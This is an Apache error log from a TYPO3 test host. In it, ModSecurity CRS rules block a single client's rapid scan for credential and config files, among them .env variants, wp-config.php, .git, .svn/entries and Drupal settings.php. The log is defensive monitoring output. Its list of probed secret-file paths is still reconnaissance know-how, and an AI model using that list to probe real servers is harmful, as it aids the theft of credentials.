[Sun May 11 04:16:16.545615 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aCAIcPYfJEmc7rpKGbevQgAAAAQ"]
[Sun May 11 04:16:16.545806 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aCAIcPYfJEmc7rpKGbevQgAAAAQ"]
[Sun May 11 04:16:16.569289 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aCAIcPYfJEmc7rpKGbevQwAAAAQ"]
[Sun May 11 04:16:16.569540 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aCAIcPYfJEmc7rpKGbevQwAAAAQ"]
[Sun May 11 04:16:16.569733 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aCAIcPYfJEmc7rpKGbevQwAAAAQ"]
[Sun May 11 04:16:21.278469 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aCAIdfYfJEmc7rpKGbevRwAAAAQ"]
[Sun May 11 04:16:21.278839 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aCAIdfYfJEmc7rpKGbevRwAAAAQ"]
[Sun May 11 04:16:21.279030 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aCAIdfYfJEmc7rpKGbevRwAAAAQ"]
[Sun May 11 04:16:21.303847 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Sun May 11 04:16:21.368942 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aCAIdfYfJEmc7rpKGbevSgAAAAQ"]
[Sun May 11 04:16:21.369193 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aCAIdfYfJEmc7rpKGbevSgAAAAQ"]
[Sun May 11 04:16:21.369388 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aCAIdfYfJEmc7rpKGbevSgAAAAQ"]
[Sun May 11 04:16:29.644593 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aCAIffYfJEmc7rpKGbevTgAAAAQ"]
[Sun May 11 04:16:29.644841 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aCAIffYfJEmc7rpKGbevTgAAAAQ"]
[Sun May 11 04:16:29.645028 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aCAIffYfJEmc7rpKGbevTgAAAAQ"]
[Sun May 11 04:16:29.689511 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "aCAIffYfJEmc7rpKGbevTwAAAAQ"]
[Sun May 11 04:16:29.689754 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "aCAIffYfJEmc7rpKGbevTwAAAAQ"]
[Sun May 11 04:16:29.689999 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "aCAIffYfJEmc7rpKGbevTwAAAAQ"]
[Sun May 11 04:16:29.712186 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 11 04:16:29.747863 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "aCAIffYfJEmc7rpKGbevUQAAAAQ"]
[Sun May 11 04:16:29.748147 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "aCAIffYfJEmc7rpKGbevUQAAAAQ"]
[Sun May 11 04:16:29.748336 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "aCAIffYfJEmc7rpKGbevUQAAAAQ"]
[Sun May 11 04:16:29.826127 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 11 04:16:29.849283 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 11 04:16:29.873274 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun May 11 04:16:29.897611 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Sun May 11 04:16:33.469351 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aCAIgfYfJEmc7rpKGbevWQAAAAQ"]
[Sun May 11 04:16:33.469596 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aCAIgfYfJEmc7rpKGbevWQAAAAQ"]
[Sun May 11 04:16:33.469805 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aCAIgfYfJEmc7rpKGbevWQAAAAQ"]
[Sun May 11 04:16:33.590250 2025] [php:error] [pid 3076463] [client 154.83.103.202:32602] script '/var/www/surf/TYPO3/public/typo3conf/localconf.php' not found or unable to stat
[Sun May 11 04:16:33.797381 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Sun May 11 04:16:33.977951 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun May 11 04:16:38.002211 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aCAIhfYfJEmc7rpKGbevaQAAAAQ"]
[Sun May 11 04:16:38.002528 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aCAIhfYfJEmc7rpKGbevaQAAAAQ"]
[Sun May 11 04:16:38.002749 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aCAIhfYfJEmc7rpKGbevaQAAAAQ"]
[Sun May 11 04:16:38.391141 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Sun May 11 04:16:38.611426 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "aCAIhvYfJEmc7rpKGbevbAAAAAQ"]
[Sun May 11 04:16:38.611689 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "aCAIhvYfJEmc7rpKGbevbAAAAAQ"]
[Sun May 11 04:16:38.611900 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "aCAIhvYfJEmc7rpKGbevbAAAAAQ"]
[Sun May 11 04:16:43.431882 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aCAIi_YfJEmc7rpKGbevcAAAAAQ"]
[Sun May 11 04:16:43.432251 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aCAIi_YfJEmc7rpKGbevcAAAAAQ"]
[Sun May 11 04:16:43.432472 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aCAIi_YfJEmc7rpKGbevcAAAAAQ"]
[Sun May 11 04:16:43.474476 2025] [authz_core:error] [pid 3076463] [client 154.83.103.202:32602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sun May 11 04:16:43.745501 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCAIi_YfJEmc7rpKGbevdgAAAAQ"]
[Sun May 11 04:16:43.745763 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCAIi_YfJEmc7rpKGbevdgAAAAQ"]
[Sun May 11 04:16:43.745952 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCAIi_YfJEmc7rpKGbevdgAAAAQ"]
[Sun May 11 04:16:43.768221 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aCAIi_YfJEmc7rpKGbevdwAAAAQ"]
[Sun May 11 04:16:43.768468 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aCAIi_YfJEmc7rpKGbevdwAAAAQ"]
[Sun May 11 04:16:43.768655 2025] [:error] [pid 3076463] [client 154.83.103.202:32602] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aCAIi_YfJEmc7rpKGbevdwAAAAQ"]
